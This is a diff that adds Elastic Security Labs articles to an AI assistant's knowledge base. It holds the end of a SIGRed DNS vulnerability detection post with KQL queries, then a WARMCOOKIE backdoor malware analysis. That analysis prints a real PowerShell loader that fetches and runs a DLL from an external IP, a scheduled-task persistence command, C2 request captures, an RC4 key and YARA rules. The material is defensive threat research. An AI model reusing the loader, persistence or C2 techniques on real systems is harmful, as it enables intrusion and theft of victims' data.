+- National Institute of Standards and Technology (NIST) assigned a critical [CVSS score](https://www.first.org/cvss/v3.1/specification-document)of 10 out of 10 based on remote code execution without authentication and potential to self-replicate without user interaction
+- The vulnerability is estimated to be 17 years old and impacts older operating systems (Windows 2003+), which may no longer be supported
+- The DNS role, which must be enabled to be impacted, is enabled in most environments, and is required by Active Directory and Kerberos services
+- The vulnerability was [reported](https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin:-exploiting-a-17-year-old-bug-in-windows-dns-servers/) by Check Point Research and given name “SIGRed”
+
+### Timeline of events
+
+- May 19, 2020 - Initial Check Point disclosure sent to Microsoft
+- June 18, 2020 - CVE-2020-1350 issued to vulnerability
+- July 14, 2020 - Microsoft released patch
+- July 16, 2020 - First public DoS proof-of-concept [published](https://github.com/maxpl0it/CVE-2020-1350-DoS)
+- July 17, 2020 - Elastic releases SIGRed public detection logic
+
+## Impact
+
+All systems leveraging the Windows DNS server service are impacted (Windows 2003+). This includes machines such as domain controllers/member servers leveraging Active Directory/Kerberos, as these services rely on the Windows DNS service.
+
+Of note, this is an impact on the way Windows DNS server improperly handles malformed requests and not an underlying issue with the DNS protocol itself.
+
+The SIGRed exploit leverages multiple tactics and techniques categorized by the MITRE ATT&CK® framework:
+
+### Tactics
+
+- [Lateral Movement](https://attack.mitre.org/tactics/TA0008)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+
+### Techniques
+
+- [External Remote Services](https://attack.mitre.org/techniques/T1133)
+- [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210)
+
+## Detection
+
+### Detection logic
+
+On June 30, 2020, The Elastic Security Intelligence & Analytics Team [released](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) our [Detection Rules Repository](https://github.com/elastic/detection-rules) to the public. Expanding on the rules that were released with that post, we’ve included network and endpoint rules that target CVE-2020-1350 (SIGRed) in the public repository:
+
+- [Unusual Child Process of dns.exe](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_unusual_dns_service_children.toml)
+- [Unusual File Modification by dns.exe](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_unusual_dns_service_file_writes.toml)
+- [Abnormally Large DNS Response](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_dns_server_overflow.toml)
+
+### Unusual child of dns.exe - Kibana Query Language (KQL)
+
+The detection logic in Figure 1 (below) identifies suspicious or unexpected child processes spawned from the Windows DNS service (dns.exe). This activity may indicate activity related to remote code execution (RCE) or other forms of exploitation.
+
+```
+event.category:process and event.type:start and process.parent.name:dns.exe and not process.name:conhost.exe
+```
+
+_Figure 1 - Unusual child process of dns.exe_
+
+### Unusual file operations of dns.exe (KQL)
+
+The detection logic in Figure 2 (below) identifies suspicious or unexpected files being modified by the Windows DNS service (dns.exe). This not only indicates potential RCE or exploitation, but may also indicate preparation for post-compromise activities. For example, this service which is running with SYSTEM privileges could be used to silently write a DLL to Windows system folder setting up possible execution through a known DLL side-loading vector.
+
+```
+event.category:file and process.name:dns.exe and not file.name:dns.log
+```
+
+_Figure 2 - Unusual file modification by dns.exe_
+
+### Network (Packetbeat and Filebeat with the Zeek or Suricata modules)
+
+As detailed in the [Check Point SIGRed research](https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin:-exploiting-a-17-year-old-bug-in-windows-dns-servers/), abnormally large DNS responses can cause the heap-based buffer overflow scenario. The logic in Figure 3 (below) identifies large DNS responses using either Packetbeat or Filebeat (with Zeek or Suricata modules enabled).
+
+```
+event.category:(network or network_traffic) and destination.port:53 and (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes>60000
+```
+
+_Figure 3 - Abnormally large DNS response (KQL)_
+
+![Figure 4 - Packetbeat network detection logic identifying SIGRed - PCAP Source: maxpl0it](/assets/images/detection-rules-for-sigred-vulnerability/packetbeat-network-blog-sigred-vulnerability.png)
+
+![Figure 5 - Filebeat (with Zeek and Suricata) network detection logic identifying SIGRed - PCAP Source: SANS Internet Storm Center](/assets/images/detection-rules-for-sigred-vulnerability/filebeat-network-blog-sigred-vulnerability.png)
+
+## Defensive recommendations
+
+1. Review and [implement](https://www.elastic.co/guide/en/siem/guide/7.8/rules-ui-create.html#create-rule-ui) the above detection logic within your environment using technology such as [Endpoint security](https://www.elastic.co/endpoint-security/), [Winlogbeat](https://www.elastic.co/beats/winlogbeat), [Packetbeat](https://www.elastic.co/beats/packetbeat), or [network security monitoring (NSM)](https://www.elastic.co/training/network-security-monitoring-engineer) platforms such as Zeek or Suricata.
+2. Use the included network rule to identify large DNS queries and responses from internal and external populations.
+3. Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restart the patched machines. If unable to patch immediately: Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn’t require a restart. This can be used as a temporary solution before the patch is applied.
+4. Maintain backups of your critical systems to aid in quick recovery.
+5. Perform routine vulnerability scans of your systems and patch identified vulnerabilities.
+
+## References
+
+1. [CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350)
+2. [CVE-2020-1350](https://nvd.nist.gov/vuln/detail/CVE-2020-1350)
+3. [SIGRed – Resolving Your Way into Domain Admin: Exploiting a 17 Year-old Bug in Windows DNS Servers](https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin:-exploiting-a-17-year-old-bug-in-windows-dns-servers/)
+4. [Elastic Security opens public detection rules repo](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo)
+5. [Maxpl0it - CVE-2020-1350 (SIGRed) - Windows DNS DoS Exploit](https://github.com/maxpl0it/CVE-2020-1350-DoS)
+6. [SANS Internet Storm Center - PATCH NOW - SIGRed - CVE-2020-1350 - Microsoft DNS Server Vulnerability](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dipping_into_danger.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dipping_into_danger.md
new file mode 100644
index 0000000000000..e47b158594d9c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dipping_into_danger.md
@@ -0,0 +1,544 @@
+---
+title: "Dipping into Danger: The WARMCOOKIE backdoor"
+slug: "dipping-into-danger"
+date: "2024-06-12"
+subtitle: "Novel malware discovery by Elastic Security Labs masquerades as a recruiting offer"
+description: "Elastic Security Labs observed threat actors masquerading as recruiting firms to deploy a new malware backdoor called WARMCOOKIE. This malware has standard backdoor capabilities, including capturing screenshots, executing additional malware, and reading/writing files."
+author:
+  - slug: daniel-stepanic
+image: "warmcookie.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - warmcookie
+  - backdoor
+  - ref6127
+---
+
+## WARMCOOKIE at a glance
+
+Elastic Security Labs observed a wave of email campaigns in late April targeting environments by deploying a new backdoor we’re calling WARMCOOKIE based on data sent through the HTTP cookie parameter. During initial triage, our team identified code overlap with a previously publicly reported [sample](https://esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign) by eSentire. The unnamed sample (`resident2.exe`) discussed in the post appears to be an older or deviated version of WARMCOOKIE. While some features are similar, such as the implementation of string obfuscation, WARMCOOKIE contains differing functionality. Our team is seeing this threat distributed daily with the use of recruiting and job themes targeting individuals.
+
+WARMCOOKIE appears to be an initial backdoor tool used to scout out victim networks and deploy additional payloads. Each sample is compiled with a hard-coded C2 IP address and RC4 key.
+
+This post will review an observed campaign and this new malware’s functionality. While the malware has a limited number of capabilities, it shouldn’t be taken lightly as it’s actively being used and impacting organizations at a global scale.
+
+## Key takeaways
+
+* REF6127 represents recruiting-themed phishing campaigns to deploy a new Windows backdoor: WARMCOOKIE
+* WARMCOOKIE is a newly discovered backdoor used to fingerprint a machine, capture screenshots of the victim machine, and deploy additional payloads
+* Threat actors are spinning up new domains and infrastructure weekly to support these campaigns
+* This research includes an IDAPython script to decrypt strings from WARMCOOKIE
+* Elastic Security provides prevention and visibility capabilities across the entire WARMCOOKIE infection chain
+
+## REF6127 campaign overview
+
+![WARMCOOKIE execution flow](/assets/images/dipping-into-danger/image10.png "WARMCOOKIE execution flow")
+
+Since late April 2024, our team has observed new phishing campaigns leveraging lures tied to recruiting firms. These emails targeted individuals by their names and their current employer, enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description. Below is an example of the phishing email collected from previous open source reporting.
+
+![Phishing email - Subject: “We’re Interested”](/assets/images/dipping-into-danger/image14.png "Phishing Email - Subject: “We’re Interested”")
+
+Once clicked, the users hit a landing page that looks like a legitimate page specifically targeted for them. There, they are prompted to download a document by solving a CAPTCHA challenge. The landing pages resemble previous campaigns documented by Google Cloud’s security team when discussing a new variant of [URSNIF](https://cloud.google.com/blog/topics/threat-intelligence/rm3-ldr4-ursnif-banking-fraud/). Below is an example of the landing page collected from previous open source reporting.
+
+![Landing page](/assets/images/dipping-into-danger/image6.png "Landing page")
+
+Once the CAPTCHA is solved, an obfuscated JavaScript file is downloaded from the page. Our sample was named `Update_23_04_2024_5689382.js`; however, other samples used a different but similar naming structure. 
+
+This obfuscated script runs PowerShell, kicking off the first task to load WARMCOOKIE.
+
+![Initial execution chain as seen in Elastic Security for Endpoint](/assets/images/dipping-into-danger/image17.png "Initial execution chain as seen in Elastic Security for Endpoint")
+
+The PowerShell script abuses the Background Intelligent Transfer Service (BITS) to download WARMCOOKIE and run the DLL with the `Start` export.
+
+```powershell
+start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + 
+    [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 
+    'http://80.66.88[.]146/data/5fb6dd81093a0d6812c17b12f139ce35' 
+    -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + 
+    ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job
+```
+
+### REF6127 infrastructure overview
+
+By leveraging tools like [urlscan.io](https://urlscan.io/ip/45.9.74.135) and [VirusTotal](https://www.virustotal.com/gui/ip-address/45.9.74.135/relations), we observed the threat actor continually generating new landing pages rapidly on IP address `45.9.74[.]135`. The actor pushed to target different recruiting firms in combination with keywords related to the job search industry. 
+
+![Domains associated with 45.9.74[.]135](/assets/images/dipping-into-danger/image3.png "Domains associated with 45.9.74[.]135")
+
+Before hitting each landing page, the adversary distances itself by using compromised infrastructure to host the initial phishing URL, which redirects the different landing pages.
+
+![Phishing link redirection](/assets/images/dipping-into-danger/image21.png "Phishing link redirection")
+
+The threat actor generates new domains while the reputation catches up with each domain after each campaign run. At the time of writing, the threat actor can be seen pivoting to fresh domains without many reputation hits.
+
+![Reputation for recently generated domains](/assets/images/dipping-into-danger/image18.png "Reputation for recently generated domains")
+
+## WARMCOOKIE malware anlaysis
+
+WARMCOOKIE is a Windows DLL used by the threat actor in two different stages. The first stage occurs right after the PowerShell download with the execution of WARMCOOKIE using the `Start` export. 
+
+### Stage 1
+
+Stage 1 copies the downloaded DLL from a temporary directory with a random name, such as: `wid4ta3v.3gm,` and places a copy of the DLL at `C:\ProgramData\RtlUpd\RtlUpd.dll`
+
+After the copy, the malware sets up persistence using COM with the Windows Task Scheduler to configure the DLL to run with the following parameters. 
+
+```cmd
+"C:\WINDOWS\system32\rundll32.exe" "C:\ProgramData\RtlUpd\RtlUpd.dll",Start /p
+```
+
+With this design choice, WARMCOOKIE will run with System privileges from the Task Scheduler Engine. Below is a screenshot from [Hatching Triage](https://tria.ge/240528-2dhvdagb62/behavioral1) showing these two stages:
+
+![WARMCOOKIE - Execution chain](/assets/images/dipping-into-danger/image13.png "WARMCOOKIE - Execution chain")
+
+#### Persistence
+
+A critical part of the infection chain comes from the scheduled task, which is set up at the very beginning of the infection. The task name (`RtlUpd`) is scheduled to run every 10 minutes every day.
+
+![Persistence - Scheduled Task](/assets/images/dipping-into-danger/image34.png "Persistence - Scheduled Task")
+
+### Stage 2
+
+The second stage is where the DLL is combined with the command line (`Start /p`) and contains the core functionality of WARMCOOKIE. The malware starts by looking for the DLL inside the temporary directory from the PowerShell download.
+
+![Initial code within WARMCOOKIE](/assets/images/dipping-into-danger/image23.png "Initial code within WARMCOOKIE")
+
+#### Obfuscation 
+
+WARMCOOKIE protects its strings using a custom string decryption algorithm. The first four bytes of each encrypted string in the `.rdata` section represent the size, the next four-bytes represent the RC4 key, and the remaining bytes represent the string.
+
+![String Obfuscation - Legend](/assets/images/dipping-into-danger/image22.png "String Obfuscation - Legend")
+
+Below is the CyberChef recipe using the bytes from the screenshot above:
+
+![String Decryption via CyberChef](/assets/images/dipping-into-danger/image9.png "String Decryption via CyberChef")
+
+One interesting observation is that the malware developer doesn’t always rotate the RC4 key between the encrypted strings.
+
+![Same RC4 key for different encrypted string](/assets/images/dipping-into-danger/image1.png "Same RC4 key for different encrypted string")
+
+#### Dynamic API loading
+
+To prevent static analysis from identifying its core functionality, WARMCOOKIE uses dynamic API loading. There is no API hashing/resolving, and the targeted DLLs and sensitive strings are protected using encryption.
+
+![Dynamic API loading within WARMCOOKIE](/assets/images/dipping-into-danger/image32.png "Dynamic API loading within WARMCOOKIE")
+
+As demonstrated in the previous image, the developer shows some consideration for OpSec: any decrypted string is wiped from memory immediately after use, potentially avoiding memory signature scans.
+
+#### Anti-debugging
+
+The malware contains a few anti-analysis checks commonly used to target sandboxes. These are based on logic for checking the active number of CPU processors and physical/virtual memory values.
+
+![Sandbox verification](/assets/images/dipping-into-danger/image40.png "Sandbox verification")
+
+Below are the following conditions:
+
+* If the number of processors is greater than or equal to 4 and the calculated value from the `GlobalMemoryStatusEx` call is greater than or equal to 0xF00, the malware will continue execution
+* If the number of processors is greater than or equal to 8, the malware will continue execution
+* If the calculated value from the `GlobalMemoryStatusEx` call is greater than `0x2000`, the malware will continue execution
+
+#### Mutex
+
+Each WARMCOOKIE sample comes hard coded with a GUID-like string as a mutex. Below are some examples we have observed:
+
+* `f92e6f3c-9cc3-4be0-966c-1be421e69140`
+* `91f785f4-2fa4-4c85-954d-b96768ca76f2`
+
+![Setup before main functionality, including mutex creation](/assets/images/dipping-into-danger/image35.png "Setup before main functionality, including mutex creation")
+
+Before the main functionality is executed, WARMCOOKIE uses an OR statement to verify the command-line arguments with `/p` returns `True` or to check whether the scheduled task persistence needs to be created.
+
+#### Execution
+
+Before the backdoor makes its first outbound network request, it captures the following values used to fingerprint and identify the victim machine. 
+
+* Volume serial number
+* DNS domain of the victim machine
+* Computer name
+* Username
+
+This was a criteria used to identify the similarities to the malware in eSentire’s [report](https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign).
+
+![Checksum calculations similar to eSentire's report](/assets/images/dipping-into-danger/image8.png "Checksum calculations similar to eSentire's report")
+
+The WARMCOOKIE C2 server likely leverages a CRC32 checksum function to verify content sent from the victim machine. Inside WARMCOOKIE itself is a checksum function that takes an input string, a length, and an initial seed value for the CRC32 function. At the beginning of the function, the seed value is negated, so at different times, the checksum function is called with different seeds. We believe the developer added this step to make it a little harder for researchers to analyze and waste time.
+
+![Beginning of CRC32 checksum function](/assets/images/dipping-into-danger/image31.png "Beginning of CRC32 checksum function")
+
+The following three checksum calculations are encrypted with RC4 and sent through the HTTP cookie parameter:
+
+* CRC32(c2_message_data)
+* CRC32(mutex) ^ volume serial number
+* CRC32(username) ^ CRC32(computer name)
+
+Below is the implementation in Python with a usage example in the Appendix:
+
+```python
+def calculate_checksum(str_input, str_len, i):
+    if i == 0:
+        i = 0xFFFFFFFF
+    if i == -1:
+        i = 0
+
+    for idx in range(0, str_len, 2):
+        v6 = str_input[idx] | (str_input[idx + 1] << 8)
+        for _ in range(16):
+            if (v6 ^ i) & 1:
+                i = ((i >> 1) ^ 0xEDB88320) & 0xFFFFFFFF
+            else:
+                i = (i >> 1) & 0xFFFFFFFF
+            v6 >>= 1
+
+    return ~i & 0xFFFFFFFF
+```
+
+#### Communication
+
+WARMCOOKIE samples communicate over HTTP with a hardcoded IP address. The family uses a combination of RC4 and Base64 to protect its network traffic. The RC4 key is embedded in each sample. We have observed the same key being used in multiple samples. The key during this analysis is `24de21a8dc08434c`
+
+![Hardcoded RC4 key being decrypted](/assets/images/dipping-into-danger/image11.png "Hardcoded RC4 key being decrypted")
+
+The malware uses a custom structure to send the initial request to the C2 server, including the previously described checksum values and several fields used to track the offsets and size of the variable data.
+
+These values are sent through the HTTP cookie parameter using the following custom structure:
+
+```cpp
+enum request_type
+{ 
+    REGISTRATION = 1, 
+    COMMAND = 2 
+};
+
+struct os_info
+{
+    int major_version;
+    int minor_version;
+    int build_number;
+    int version_calc;
+};
+
+struct initial_request
+{
+    int checksum_c2_message_data;
+    int checksum_volume_mutex;
+    int checksum_computer_name_username;
+    request_type request_type;
+    os_info os_ver;
+    int offset_to_dns_domain;
+    int size_base64_dns_domain;
+    int offset_to_base64_computer_name;
+    int size_base64_computer_name;
+    int offset_to_base64_username;
+    int size_base64_username;
+    char base64_dns_domain[]; // Variable-length array
+    char base64_username[]; // Variable-length array
+    char base64_computer_name[]; // Variable-length array 
+};
+```
+
+The first request to the C2 server is sent through a GET request using User Agent: `Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.0.3705`.
+
+```curl
+GET http://185.49.69[.]41/ HTTP/1.1
+Cookie: x41OYTpmEwUUKm2AvnkS2onu1XqjP6shVvosIXkAD957a9RplEGFsUjR8f/lP1O8EERtf+idl0bimsKh8mRA7+dL0Yk09SwgTUKBu9WEK4RwjhkYuxd2JGXxhlA=
+User-Agent: Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.0.3705)
+Host: 185.49.69[.]41
+Connection: Keep-Alive
+Pragma: no-cache
+```
+
+Below is the CyberChef recipe of the HTTP cookie parameter decrypted from the first request, followed by a legend of the fields:  
+
+![Decryption of HTTP cookie via CyberChef](/assets/images/dipping-into-danger/image24.png "Decryption of HTTP cookie via CyberChef")
+
+![Decryption of HTTP cookie parameters via ImHex](/assets/images/dipping-into-danger/image20.png "Decryption of HTTP cookie parameters via ImHex")
+
+WARMCOOKIE inserts a few integrity checks by generating hashes using the previously described checksum function. For example, the data in the decrypted HTTP cookie parameter from the 4th byte to the end is hashed and placed at the beginning (offset 0). Using the example above, this checksum value is `0xe51387e9`
+
+Before the malware can receive instructions, integrity checks are also used to verify the incoming response from the C2 server. In this scenario, the C2 server produces the expected checksum for the data sent to the victim machine. This is located in the first four bytes of the request.
+ 
+![Checksum verification from incoming server request](/assets/images/dipping-into-danger/image7.png "Checksum verification from incoming server request")
+
+Below is a demonstration of this integrity check where the request data’s hash is `0x50d26cc3`.
+
+![Integrity check via CyberChef](/assets/images/dipping-into-danger/image39.png "Integrity check via CyberChef")
+
+If the checksum matches, WARMCOOKIE reads the command ID at the 8th-byte offset of the request to proceed to move to the next command handler.
+
+### Bot functionality
+
+WARMCOOKIE provides 7 command handlers for threat actors to retrieve additional victim information, record screenshots, launch additional payloads, etc. The provided functionality is relatively straightforward, allowing threat groups that need a lightweight backdoor to monitor victims and deploy further damaging payloads such as ransomware.
+
+| Command ID | Description                                             |
+|------------|---------------------------------------------------------|
+| 1          | Retrieve victim details                                 |
+| 2          | Record screenshots of victim machine                    |
+| 3          | Retrieve installed programs via Uninstall registry path |
+| 4          | Command-line execution (cmd.exe /c)                     |
+| 5          | Write file to victim machine                            |
+| 6          | Read file from victim machine                           |
+| 10         | Delete scheduled task persistence                       |
+
+#### Retrieve victim details - command ID (1)
+
+This handler fingerprints and identifies the victim machines by collecting the IP address and CPU information. Interestingly, the imports required for this handler are statically imported. 
+
+![Retrieving CPU info (Handler 1)](/assets/images/dipping-into-danger/image16.png "Retrieving CPU info (Handler 1)")
+
+The malware uses HTTP `POST` requests when sending data back to the C2 server. The HTTP POST request data is encrypted via RC4 and sent over the network in raw form. In addition, the IP address and CPU information are Base64 encoded.
+
+```curl
+POST http://185.49.69[.]41/ HTTP/1.1
+Cookie: x41OYTpmEwUUKm2AvnkS2onu1XqjP6shVvosIXkAD957a9RplEGFsUjR8f/lP1O8EERtf+idl0bimsKh8mRA7+dL0Yk09SwgTUKBu9WEK4RwjhkYuxd2JGXxhlA=
+User-Agent: Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.0.3705)
+Host: 185.49.69.41
+Content-Length: 136
+Connection: Keep-Alive
+Pragma: no-cache
+
+  qI:f*m  yڂ  z ? !  ,!w   k i A  K    k8 .(M ޣ> ދ  u[ôz  0 -U~    9 z G(  *X  o_  _      * Y, q  glTs   XI8b\)W   W"
+```
+
+After decrypting the HTTP POST request data, this presents a similar structure as before, where the data is front-loaded with the checksum values, offsets, and sizes to the pertinent information targeted by the handler. In this case, the Base64 encoded data is the IP Address and CPU info.
+
+![Decrypted POST Request Data from Handler 1](/assets/images/dipping-into-danger/image36.png "Decrypted POST Request Data from Handler 1")
+
+| Encoded Value                                                    | Decoded Value                                           |
+|------------------------------------------------------------------|---------------------------------------------------------|
+| MTkyLjE2OC4xODIuMTMx                                             | 192.168.182.131                                         |
+| QU1EIFJ5emVuIDcgNzgwMFgzRCA4LUNvcmUgUHJvY2Vzc29yICAgICAgICAgICA= | AMD Ryzen 7 7800X3D 8-Core Processor                    |
+
+#### Screenshot capture - command ID (2)
+
+The ability to capture screenshots from victim machines provides a wide range of malicious options, such as stealing sensitive information displayed on the screen or actively monitoring the victim’s machine. This handler dynamically loads Windows DLLs used for graphics and drawing operations, such as `GDI32.DLL` and `GDIPLUS.DLL`, and then uses various APIs, such as `BitBlt`,`CreateCompatibleBitmap`, and `GetSystemMetrics` to generate the screenshot.
+
+![Screen capture via BitBlt](/assets/images/dipping-into-danger/image26.png "Screen capture via BitBlt")
+
+The collected screenshot is encrypted with RC4 and sent through a POST request along with the checksum data.
+
+![Decrypted POST Request Data from Handler 3](/assets/images/dipping-into-danger/image38.png "Decrypted POST Request Data from Handler 3")
+
+By looking for the file header `JPEG File Interchange Format (JFIF)`, we can carve out the image, and find a high-quality image of our sandbox machine (below) based on our request to this handler.
+
+![Desktop capture from VM sandbox](/assets/images/dipping-into-danger/image29.jpg "Desktop capture from VM sandbox")
+
+#### Retrieve installed programs - command ID (3)
+
+This handler enumerates the installed programs on the victim machine via the registry key:
+
+```
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
+```
+
+![Grabbing the installed programs from the registry](/assets/images/dipping-into-danger/image12.png "Grabbing the installed programs from the registry")
+
+The program's name, version, and installation date are Base64 encoded and placed into a pipe-delimited format along with the checksum data, offsets, and sizing.
+
+![Decrypted POST Request Data from Handler 3](/assets/images/dipping-into-danger/image15.png "Decrypted POST Request Data from Handler 3")
+
+Below is an example of one of the registry entries:
+
+| Encoded Value            | Decoded Value     |
+|--------------------------|-------------------|
+| Ny1aaXAgMTguMDEgKHg2NCk= | 7-Zip 18.01 (x64) |
+
+#### Command-line execution - command ID (4)
+
+WARMCOOKIE uses this handler to provide backdoor access to the victim machine. The operator provides an argument that gets executed to `cmd.exe /c `without a console window.
+
+![New process creation with custom command line](/assets/images/dipping-into-danger/image37.png "New process creation with custom command line")
+
+In the example below, `whoami` is provided as the argument:
+
+![Process tree with command-lines](/assets/images/dipping-into-danger/image33.png "Process tree with command-lines")
+
+This function reads the output from the provided command and stores it in Base64, where it’s sent back to the C2 server. Below is an example of the decrypted data for this handler:
+
+![Decrypted POST Request Data from Handler 4](/assets/images/dipping-into-danger/image30.png "Decrypted POST Request Data from Handler 4")
+
+| Encoded Value                | Decoded Value       |
+|------------------------------|---------------------|
+| ZGVza3RvcC0yYzNpcWhvXHJlbQ0K | desktop-2c3iqho\rem |
+
+#### Write file - command ID (5)
+
+WARMCOOKIE can drop files on the victim machine; the threat actors provide the file path and file data.
+
+![File Creation within Handler 5](/assets/images/dipping-into-danger/image28.png "File Creation within Handler 5")
+
+As a test, we can write a file within a directory with some data and then read it in the next handler.
+
+![Custom file creation](/assets/images/dipping-into-danger/image27.png "Custom file creation")
+
+![Data written to custom file](/assets/images/dipping-into-danger/image19.png "Data written to custom file")
+
+Depending on the file write result, WARMCOOKIE will send out a POST request with one of the following Base64 encoded values:
+
+* `OK`
+* `ERROR: Cannot write file`
+
+![Decrypted POST Request Data from Handler 5](/assets/images/dipping-into-danger/image2.png "Decrypted POST Request Data from Handler 5")
+
+#### Read file - command ID (6)
+
+This handler can read file content from machines infected with WARMCOOKIE. The threat actor needs to provide the file path as the argument. 
+
+![Reading files within Handler 6](/assets/images/dipping-into-danger/image25.png "Reading files within Handler 6")
+
+Depending on the file read result, WARMCOOKIE will send out a POST request with one of the following Base64 encoded values along with the file contents:
+
+* `OK (See 'Files' tab)`
+* `ERROR: Cannot read file`
+
+![Decrypted POST Request Data from Handler 6](/assets/images/dipping-into-danger/image5.png "Decrypted POST Request Data from Handler 6")
+
+Based on the previous wording around a `Files` tab, the WARMCOOKIE operators may use a GUI element.
+
+#### Remove persistence - command ID (10)
+
+This handler removes the previously configured scheduled task with the name `RtlUpd`. By leveraging COM, it will call `DeleteFileW` within `mstask.dll` to remove the task.
+
+![Callstack showing task deletion via COM](/assets/images/dipping-into-danger/image4.png "Callstack showing task deletion via COM")
+
+## IDA string decryption tool
+
+Elastic Security Labs is releasing an IDAPython script used to decrypt strings from WARMCOOKIE. The decrypted strings will be placed in the IDA Pro decompiler helping analysts identify key functionality. The string decryption and IDA commenting tool can be downloaded [here](https://github.com/elastic/labs-releases/tree/main/tools/warmcookie).
+
+## Conclusion
+
+WARMCOOKIE is a newly discovered backdoor that is gaining popularity and is being used in campaigns targeting users across the globe. Our team believes this malware represents a formidable threat that provides the capability to access target environments and push additional types of malware down to victims. While there is room for improvement on the malware development side, we believe these minor issues will be addressed over time. Elastic Security Labs will continue to monitor this threat and recommends that the industry do the same.
+
+## WARMCOOKIE and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+* [Initial Access](https://attack.mitre.org/tactics/TA0001)
+* [Execution](https://attack.mitre.org/tactics/TA0002/)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+* [Discovery](https://attack.mitre.org/tactics/TA0007)
+* [Command and Control](https://attack.mitre.org/tactics/TA0011)
+* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+
+### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+
+* [Phishing](https://attack.mitre.org/techniques/T1566/)
+* [User Execution: Malicious Link](https://attack.mitre.org/techniques/T1204/001/)
+* [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)
+* [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/)
+* [Screen Capture](https://attack.mitre.org/techniques/T1113/)
+* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)
+
+## Preventing and detecting WARMCOOKIE
+
+### Prevention
+
+* [Suspicious PowerShell Downloads](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml)
+* [Scheduled Task Creation by an Unusual Process](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/persistence_scheduled_task_creation_by_an_unusual_process.toml)
+* [Suspicious PowerShell Execution via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_execution.toml)
+* [RunDLL32/Regsvr32 Loads a DLL Downloaded via BITS](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_rundll32_regsvr32_loads_a_dll_downloaded_via_bits.toml)
+* [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)
+* [Windows.Trojan.WarmCookie](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_WarmCookie.yar)
+
+### Detection w/YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify [WARMCOOKIE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_WarmCookie.yar):
+
+```yara
+rule Windows_Trojan_WarmCookie_7d32fa90 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-04-29"
+        last_modified = "2024-05-08"
+        os = "Windows"
+        arch = "x86"
+        threat_name = "Windows.Trojan.WarmCookie"
+        license = "Elastic License v2"
+
+     strings:
+        $seq_checksum = { 45 8D 5D ?? 45 33 C0 41 83 E3 ?? 49 8D 4E ?? 44 03 DB 41 8D 53 ?? }
+        $seq_string_decrypt = { 8B 69 04 48 8D 79 08 8B 31 89 6C 24 ?? 48 8D 4E ?? E8 }
+        $seq_filesearch = { 48 81 EC 58 02 00 00 48 8B 05 82 0A 02 00 48 33 C4 48 89 84 24 40 02 00 00 45 33 C9 48 8D 44 24 30 45 33 C0 48 89 44 24 20 33 C9 41 8D 51 1A FF 15 83 4D 01 00 85 C0 78 22 48 8D 4C 24 30 E8 1D }
